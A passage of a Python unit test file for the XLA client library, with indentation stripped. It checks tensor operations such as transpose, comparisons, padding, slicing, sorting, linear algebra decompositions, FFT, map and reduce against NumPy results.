_TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]]))
_TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]], order="F"))
_TransposeAndTest(array_fun([[1, 2], [4, 5]]))
_TransposeAndTest(array_fun([[1, 2], [4, 5]], order="F"))
def testTranspose(self):
def _TransposeAndTest(array, permutation):
c = self._NewComputation()
c.Transpose(c.Constant(array), permutation)
expected = np.transpose(array, permutation)
self._ExecuteAndCompareClose(c, expected=expected)
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [1, 0])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [1, 0])
arr = np.random.RandomState(0).randn(2, 3, 4).astype(np.float32)
for permutation in itertools.permutations(range(arr.ndim)):
_TransposeAndTest(arr, permutation)
_TransposeAndTest(np.asfortranarray(arr), permutation)
def testEq(self):
c = self._NewComputation()
c.Eq(
c.Constant(NumpyArrayS32([1, 2, 3, 4])),
c.Constant(NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False])
def testNe(self):
c = self._NewComputation()
c.Ne(
c.Constant(NumpyArrayS32([1, 2, 3, 4])),
c.Constant(NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, True])
c.Ne(
c.Constant(NumpyArrayF32([-2.0, 0.0,
float("nan"),
float("nan")])),
c.Constant(NumpyArrayF32([2.0, -0.0, 1.0, float("nan")])))
self._ExecuteAndAssertWith(
np.testing.assert_allclose, c, (), expected=[True, False, True, True])
def testGt(self):
c = self._NewComputation()
c.Gt(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False, False])
def testGe(self):
c = self._NewComputation()
c.Ge(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[True, True, True, False, False])
def testLt(self):
c = self._NewComputation()
c.Lt(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[False, False, False, True, True])
def testLe(self):
c = self._NewComputation()
c.Le(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, True, True])
def testMax(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[1.0, 2.0, 3.0, 7.0, 12.0])
def testMaxExplicitBroadcastDim0(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareExact(c, expected=[[3, 3, 3], [4, 5, 6], [7, 8, 9]])
def testMaxExplicitBroadcastDim1(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareExact(c, expected=[[3, 4, 5], [4, 5, 6], [7, 8, 9]])
def testMin(self):
c = self._NewComputation()
c.Min(
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[1.0, 0.0, 2.0, 4.0, 9.0])
def testPad(self):
c = self._NewComputation()
c.Pad(
c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
c.Constant(NumpyArrayF32(0.0)), [(1, 2, 1), (0, 1, 0)])
self._ExecuteAndCompareClose(
c,
expected=[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0],
[3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]])
def testPadWithPaddingConfig(self):
c = self._NewComputation()
padding_config = xla_client.PaddingConfig()
for lo, hi, interior in [(1, 2, 1), (0, 1, 0)]:
dimension = xla_client.PaddingConfigDimension()
dimension.edge_padding_low = lo
dimension.edge_padding_high = hi
dimension.interior_padding = interior
padding_config.dimensions.append(dimension)
c.Pad(
c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
c.Constant(NumpyArrayF32(0.0)), padding_config)
self._ExecuteAndCompareClose(
c,
expected=[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0],
[3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]])
def testReshape(self):
c = self._NewComputation()
c.Reshape(
c.Constant(NumpyArrayS32([[1, 2], [3, 4], [5, 6]])),
dimensions=[0, 1],
new_sizes=[2, 3])
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 5, 6]])
def testCollapse(self):
c = self._NewComputation()
c.Collapse(
c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[1, 2])
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3, 4], [5, 6, 7, 8]])
def testRev(self):
c = self._NewComputation()
c.Rev(
c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[0, 2])
self._ExecuteAndCompareExact(
c, expected=[[[6, 5], [8, 7]], [[2, 1], [4, 3]]])
def testReducePrecision(self):
c = self._NewComputation()
c.ReducePrecision(
c.Constant(NumpyArrayF32([float.fromhex("0x1.32fffep-3")])),
exponent_bits=8,
mantissa_bits=7)
self._ExecuteAndCompareClose(c, expected=[float.fromhex("0x1.32p-3")])
def testClampF32(self):
c = self._NewComputation()
c.Clamp(
c.Constant(NumpyArrayF32(-1)),
c.Constant(NumpyArrayF32([-2, -1, 0, 1, 2, 3])),
c.Constant(NumpyArrayF32(2)))
self._ExecuteAndCompareExact(c, expected=[-1, -1, 0, 1, 2, 2])
def testClampS32(self):
c = self._NewComputation()
c.Clamp(
c.Constant(NumpyArrayS32(-1)),
c.Constant(NumpyArrayS32([-2, -1, 0, 1, 2, 3])),
c.Constant(NumpyArrayS32(2)))
self._ExecuteAndCompareExact(c, expected=[-1, -1, 0, 1, 2, 2])
def testSelect(self):
c = self._NewComputation()
c.Select(
c.Constant(NumpyArrayBool([True, False, False, True, False])),
c.Constant(NumpyArrayS32([1, 2, 3, 4, 5])),
c.Constant(NumpyArrayS32([-1, -2, -3, -4, -5])))
self._ExecuteAndCompareExact(c, expected=[1, -2, -3, 4, -5])
def testSlice(self):
c = self._NewComputation()
c.Slice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])), [1, 0],
[3, 2])
self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])
def testSliceInDim(self):
c = self._NewComputation()
c.SliceInDim(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=1,
limit_index=2,
stride=1,
dimno=1)
self._ExecuteAndCompareExact(c, expected=[[2], [5], [8]])
c.SliceInDim(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=0,
limit_index=3,
stride=2,
dimno=0)
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [7, 8, 9]])
def testDynamicSlice(self):
c = self._NewComputation()
c.DynamicSlice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayS32([1, 0])), [2, 2])
self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])
def testDynamicUpdateSlice(self):
c = self._NewComputation()
c.DynamicUpdateSlice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayS32([[1, 2], [3, 4]])),
c.Constant(NumpyArrayS32([1, 1])))
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 1, 2], [7, 3, 4]])
def testTuple(self):
c = self._NewComputation()
c.Tuple(
c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])),
c.Constant(NumpyArrayBool([True, False, False, True])))
result = xla_client.execute_with_python_values(c.Build().Compile())
self.assertIsInstance(result, tuple)
np.testing.assert_equal(result[0], 42)
np.testing.assert_allclose(result[1], [1.0, 2.0])
np.testing.assert_equal(result[2], [True, False, False, True])
def testGetTupleElement(self):
c = self._NewComputation()
c.GetTupleElement(
c.Tuple(
c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])),
c.Constant(NumpyArrayBool([True, False, False, True]))), 1)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0])
def testBroadcast(self):
c = self._NewComputation()
c.Broadcast(c.Constant(NumpyArrayS32([10, 20, 30, 40])), sizes=(3,))
self._ExecuteAndCompareExact(
c, expected=[[10, 20, 30, 40], [10, 20, 30, 40], [10, 20, 30, 40]])
def testBroadcastInDim(self):
c = self._NewComputation()
c.BroadcastInDim(c.Constant(NumpyArrayS32([1, 2])), [2, 2], [0])
self._ExecuteAndCompareExact(c, expected=[[1, 1], [2, 2]])
c.BroadcastInDim(c.Constant(NumpyArrayS32([1, 2])), [2, 2], [1])
self._ExecuteAndCompareExact(c, expected=[[1, 2], [1, 2]])
def testRngNormal(self):
shape = (2, 3)
c = self._NewComputation()
c.RngNormal(
c.Constant(NumpyArrayF32(0.)),
c.Constant(NumpyArrayF32(1.)),
dims=shape)
result = xla_client.execute_with_python_values(c.Build().Compile())
# since the result is random, we just check shape and uniqueness
self.assertEqual(result.shape, shape)
self.assertLen(np.unique(result), np.prod(shape))
def testRngUniformF32(self):
lo, hi = 2., 4.
shape = (2, 3)
c = self._NewComputation()
c.RngUniform(
c.Constant(NumpyArrayF32(lo)),
c.Constant(NumpyArrayF32(hi)),
dims=shape)
result = xla_client.execute_with_python_values(c.Build().Compile())
# since the result is random, we just check shape, uniqueness, and range
self.assertEqual(result.shape, shape)
self.assertLen(np.unique(result), np.prod(shape))
self.assertTrue(np.all(lo <= result))
self.assertTrue(np.all(result < hi))
def testRngUniformS32(self):
lo, hi = 2, 4
shape = (2, 3)
c = self._NewComputation()
c.RngUniform(
c.Constant(NumpyArrayS32(lo)),
c.Constant(NumpyArrayS32(hi)),
dims=shape)
result = xla_client.execute_with_python_values(c.Build().Compile())
# since the result is random, we just check shape, integrality, and range
self.assertEqual(result.shape, shape)
self.assertEqual(result.dtype, np.int32)
self.assertTrue(np.all(lo <= result))
self.assertTrue(np.all(result < hi))
def testCholesky(self):
l = np.array([[4, 0, 0, 0], [6, 5, 0, 0], [2, 14, 16, 0], [3, 6, 1, 4]],
dtype=np.float32)
c = self._NewComputation()
c.Cholesky(c.Constant(np.dot(l, l.T)))
self._ExecuteAndCompareClose(c, expected=l, rtol=1e-4)
def testSort(self):
keys = np.array([[2, 4, 1, 3], [3, 1, 4, 2]], dtype=np.float32)
c = self._NewComputation()
c.Sort(c.Constant(keys))
self._ExecuteAndCompareClose(
c, expected=np.array([[1, 2, 3, 4], [1, 2, 3, 4]], dtype=np.float32))
def testSortKeyVal(self):
keys = np.array([[2, 4, 1, 3], [3, 1, 4, 2]], dtype=np.float32)
values = np.array([[0, 1, 2, 3], [4, 5, 6, 7]], dtype=np.int32)
c = self._NewComputation()
c.Sort((c.Constant(keys), c.Constant(values)), dimension=0)
result = xla_client.execute_with_python_values(c.Build().Compile())
self.assertIsInstance(result, tuple)
np.testing.assert_allclose(result[0], [[2, 1, 1, 2], [3, 4, 4, 3]])
np.testing.assert_equal(result[1], [[0, 5, 2, 7], [4, 1, 6, 3]])
def testSortCustomComparator(self):
b = self._NewComputation("comparator")
p0 = b.ParameterFromNumpy(NumpyArrayF32(0))
q0 = b.ParameterFromNumpy(NumpyArrayF32(0))
p1 = b.ParameterFromNumpy(NumpyArrayS32(0))
q1 = b.ParameterFromNumpy(NumpyArrayS32(0))
b.Or(b.Lt(p0, q0), b.And(b.Eq(p0, q0), b.Gt(p1, q1)))
comparator = b.Build()
keys = np.array([[2, 3, 1, 3], [3, 1, 2, 2]], dtype=np.float32)
values = np.array([[0, 1, 2, 3], [4, 5, 6, 7]], dtype=np.int32)
c = self._NewComputation()
c.Sort((c.Constant(keys), c.Constant(values)),
dimension=1,
comparator=comparator)
result = xla_client.execute_with_python_values(c.Build().Compile())
self.assertIsInstance(result, tuple)
np.testing.assert_allclose(result[0], [[1, 2, 3, 3], [1, 2, 2, 3]])
np.testing.assert_equal(result[1], [[2, 0, 3, 1], [5, 7, 6, 4]])
def testQR(self):
a = np.array(
[[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166], [10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
c.QR(c.Constant(a), full_matrices=True)
q, r = self._Execute(c, ())
np.testing.assert_allclose(np.dot(q, r), a, rtol=1e-4)
def testEigh(self):
a = np.array(
[[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166], [10, 63, 166, 310]],
dtype=np.float32)
a = (a + a.T) / 2
c = self._NewComputation()
c.Eigh(c.Constant(a), full_matrices=True)
# TODO(b/129396575): Turn this test back on when it passes without fastmath.
# v, w = self._Execute(c, ())
# self.assertLess(np.linalg.norm(np.dot(a, v) - w * v), 1e-3)
def testSVD(self):
a = np.array(
[[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166], [10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
c.SVD(c.Constant(a))
u, d, v = self._Execute(c, ())
self.assertLess(np.linalg.norm(a - np.matmul(u * d, v.T)), 1e-3)
def testTriangularSolve(self):
a_vals = np.array(
[[2, 0, 0, 0], [3, 6, 0, 0], [4, 7, 9, 0], [5, 8, 10, 11]],
dtype=np.float32)
b_vals = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]],
dtype=np.float32)
c = self._NewComputation()
c.TriangularSolve(
c.Constant(a_vals),
c.Constant(b_vals),
left_side=False,
lower=True,
transpose_a=True)
self._ExecuteAndCompareClose(
c,
expected=np.array([
[0.5, 0.08333334, 0.04629629, 0.03367003],
[2.5, -0.25, -0.1388889, -0.1010101],
[4.5, -0.58333331, -0.32407406, -0.23569024],
],
dtype=np.float32),
rtol=1e-4)
def testIsConstant(self):
c = self._NewComputation()
a = c.ConstantS32Scalar(3)
b = c.ConstantS32Scalar(1)
x = c.ParameterFromNumpy(NumpyArrayS32(0))
const_expr = c.Sub(b, a)
non_const_expr = c.Mul(const_expr, x)
self.assertTrue(c.IsConstant(const_expr))
self.assertFalse(c.IsConstant(non_const_expr))
# self.assertTrue(c.IsConstant(c.Sub(c.Add(x, a), x))) # TODO(b/77245564)
def testGather(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
indices = np.array([[[0, 2], [2, 1]], [[1, 2], [2, 0]]], dtype=np.int32)
dnums = xla_client.GatherDimensionNumbers()
dnums.offset_dims.append(1)
dnums.offset_dims.append(2)
dnums.start_index_map.append(0)
dnums.start_index_map.append(1)
dnums.index_vector_dim = 2
c = self._NewComputation()
c.Gather(c.Constant(a), c.Constant(indices), dnums, slice_sizes=[1, 1])
g = self._Execute(c, ())
expected = np.array([[[[2, 7]]], [[[5, 6]]]], dtype=np.int32)
np.testing.assert_allclose(g, expected, rtol=1e-4)
def testFft(self):
shape = [2, 3, 4, 5]
rng = np.random.RandomState(0)
a = rng.randn(*shape) + 1.0j * rng.randn(*shape)
a = a.astype(np.complex64)
# FFT
c = self._NewComputation()
c.Fft(c.Constant(a), xla_client.FftType.FFT, shape[-3:])
self._ExecuteAndCompareClose(c, expected=np.fft.fftn(a, axes=(1, 2, 3)),
rtol=1e-4)
# IFFT
c = self._NewComputation()
c.Fft(c.Constant(a), xla_client.FftType.IFFT, shape[-3:])
self._ExecuteAndCompareClose(c, expected=np.fft.ifftn(a, axes=(1, 2, 3)),
rtol=1e-4)
# RFFT
b = rng.randn(*shape).astype(np.float32)
c = self._NewComputation()
c.Fft(c.Constant(b), xla_client.FftType.RFFT, shape[-3:])
self._ExecuteAndCompareClose(c, expected=np.fft.rfftn(b, axes=(1, 2, 3)),
rtol=1e-4)
# IRFFT
c = self._NewComputation()
c.Fft(c.Constant(a), xla_client.FftType.IRFFT, [3, 4, 8])
self._ExecuteAndCompareClose(c, expected=np.fft.irfftn(a, axes=(1, 2, 3)),
rtol=1e-4)
class EmbeddedComputationsTest(ComputationTest):
"""Tests for XLA graphs with embedded computations (such as maps)."""
def _CreateConstantS32Computation(self):
"""Computation (f32) -> s32 that returns a constant 1 for any input."""
c = self._NewComputation("constant_s32_one")
# TODO(eliben): consider adding a nicer way to create new parameters without
# having to create dummy Numpy arrays or populating Shape messages. Perhaps
# we need our own (Python-client-own) way to represent Shapes conveniently.
c.ParameterFromNumpy(NumpyArrayF32(0))
c.ConstantS32Scalar(1)
return c.Build()
def _CreateConstantS64Computation(self):
"""Computation (f64) -> s64 that returns a constant 1 for any input."""
c = self._NewComputation("constant_s64_one")
# TODO(eliben): consider adding a nicer way to create new parameters without
# having to create dummy Numpy arrays or populating Shape messages. Perhaps
# we need our own (Python-client-own) way to represent Shapes conveniently.
c.ParameterFromNumpy(NumpyArrayF64(0))
c.ConstantS64Scalar(1)
return c.Build()
def _CreateConstantF32Computation(self):
"""Computation (f32) -> f32 that returns a constant 1.0 for any input."""
c = self._NewComputation("constant_f32_one")
c.ParameterFromNumpy(NumpyArrayF32(0))
c.ConstantF32Scalar(1.0)
return c.Build()
def _CreateConstantF64Computation(self):
"""Computation (f64) -> f64 that returns a constant 1.0 for any input."""
c = self._NewComputation("constant_f64_one")
c.ParameterFromNumpy(NumpyArrayF64(0))
c.ConstantF64Scalar(1.0)
return c.Build()
def _CreateMulF32By2Computation(self):
"""Computation (f32) -> f32 that multiplies its parameter by 2."""
c = self._NewComputation("mul_f32_by2")
c.Mul(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(2.0))
return c.Build()
def _CreateMulF32ByParamComputation(self):
"""Computation (f32) -> f32 that multiplies one parameter by the other."""
c = self._NewComputation("mul_f32_by_param")
c.Mul(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateMulF64By2Computation(self):
"""Computation (f64) -> f64 that multiplies its parameter by 2."""
c = self._NewComputation("mul_f64_by2")
c.Mul(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(2.0))
return c.Build()
def _CreateBinaryAddS32Computation(self):
"""Computation (s32, s32) -> s32 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayS32(0)),
c.ParameterFromNumpy(NumpyArrayS32(0)))
return c.Build()
def _CreateBinaryAddF32Computation(self):
"""Computation (f32, f32) -> f32 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryAddF64Computation(self):
"""Computation (f64, f64) -> f64 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _CreateBinaryDivF32Computation(self):
"""Computation (f32, f32) -> f32 that divides its two parameters."""
c = self._NewComputation("div_param0_by_param1")
c.Div(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryDivF64Computation(self):
"""Computation (f64, f64) -> f64 that divides its two parameters."""
c = self._NewComputation("div_param0_by_param1")
c.Div(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _CreateTestF32Lt10Computation(self):
"""Computation (f32) -> bool that tests if its parameter is less than 10."""
c = self._NewComputation("test_f32_lt_10")
c.Lt(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(10.))
return c.Build()
def _CreateTestF64Lt10Computation(self):
"""Computation (f64) -> bool that tests if its parameter is less than 10."""
c = self._NewComputation("test_f64_lt_10")
c.Lt(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(10.))
return c.Build()
def _CreateBinaryGeF32Computation(self):
"""Computation (f32, f32) -> bool that tests first_param >= second_param."""
c = self._NewComputation("param0_lt_param1")
c.Ge(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryGeF64Computation(self):
"""Computation (f64, f64) -> bool that tests first_param >= second_param."""
c = self._NewComputation("param0_lt_param1")
c.Ge(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _MakeSample3DArrayF32(self):
return NumpyArrayF32([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])
def _MakeSample3DArrayF64(self):
return NumpyArrayF64([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])
def testCallF32(self):
c = self._NewComputation()
c.Call(
self._CreateMulF32By2Computation(),
operands=(c.ConstantF32Scalar(5.0),))
self._ExecuteAndCompareClose(c, expected=10.0)
def testCallF64(self):
c = self._NewComputation()
c.Call(
self._CreateMulF64By2Computation(),
operands=(c.ConstantF64Scalar(5.0),))
self._ExecuteAndCompareClose(c, expected=10.0)
def testMapEachElementToS32Constant(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantS32Computation(), [0])
self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1])
def testMapEachElementToS64Constant(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantS64Computation(), [0])
self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1])
def testMapMulBy2F32(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateMulF32By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0])
def testMapMulBy2F64(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateMulF64By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0])
def testSimpleMapChainF32(self):
# Chains a map of constant-f32 with a map of mul-by-2
c = self._NewComputation()
const_f32 = c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantF32Computation(), [0])
c.Map([const_f32], self._CreateMulF32By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0])
def testSimpleMapChainF64(self):
# Chains a map of constant-f64 with a map of mul-by-2
c = self._NewComputation()
const_f64 = c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantF64Computation(), [0])
c.Map([const_f64], self._CreateMulF64By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0])
def testDivVectorsWithMapF32(self):
c = self._NewComputation()
c.Map((c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])),
c.Constant(NumpyArrayF32([5.0, 5.0, 4.0, 4.0]))),
self._CreateBinaryDivF32Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0])
def testDivVectorsWithMapF64(self):
c = self._NewComputation()
c.Map((c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])),
c.Constant(NumpyArrayF64([5.0, 5.0, 4.0, 4.0]))),
self._CreateBinaryDivF64Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0])
def testSelectAndScatterF32(self):
c = self._NewComputation()
c.SelectAndScatter(
c.Constant(NumpyArrayF32([[1., 2., 6.], [4., 5., 3.]])),
select=self._CreateBinaryGeF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID,
source=c.Constant(NumpyArrayF32([[0.1, 0.2]])),
init_value=c.Constant(NumpyArrayF32(1)),
scatter=self._CreateBinaryAddF32Computation())
self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]])
def testSelectAndScatterF64(self):
c = self._NewComputation()
c.SelectAndScatter(
c.Constant(NumpyArrayF64([[1., 2., 6.], [4., 5., 3.]])),
select=self._CreateBinaryGeF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID,
source=c.Constant(NumpyArrayF64([[0.1, 0.2]])),
init_value=c.Constant(NumpyArrayF64(1)),
scatter=self._CreateBinaryAddF64Computation())
self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]])
def testReduce1DtoScalarF32(self):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=10)
def testReduce1DtoScalarF64(self):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=10)
def testReduce2DTo1DDim0F32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=[5, 7, 9])
def testReduce2DTo1DDim0F64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=[5, 7, 9])
def testReduce2DTo1DDim1F32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[1])
self._ExecuteAndCompareClose(c, expected=[6, 15])
def testReduce2DTo1DDim1F64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[1])
self._ExecuteAndCompareClose(c, expected=[6, 15])
def testReduce3DAllPossibleWaysF32(self):
input_array = self._MakeSample3DArrayF32()
def _ReduceAndTest(*dims):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=dims)
self._ExecuteAndCompareClose(
c, expected=np.sum(input_array, axis=tuple(dims)))
_ReduceAndTest(0)
_ReduceAndTest(0, 1)
_ReduceAndTest(0, 2)
_ReduceAndTest(1, 2)
_ReduceAndTest(0, 1, 2)
def testReduce3DAllPossibleWaysF64(self):
input_array = self._MakeSample3DArrayF64()
def _ReduceAndTest(*dims):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=dims)
self._ExecuteAndCompareClose(
c, expected=np.sum(input_array, axis=tuple(dims)))
_ReduceAndTest(0)
_ReduceAndTest(0)
_ReduceAndTest(0, 1)
_ReduceAndTest(0, 2)
_ReduceAndTest(1, 2)
_ReduceAndTest(0, 1, 2)
def testReduceWindowValidUnitStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 1),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]])
def testReduceWindowSameUnitStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 1),
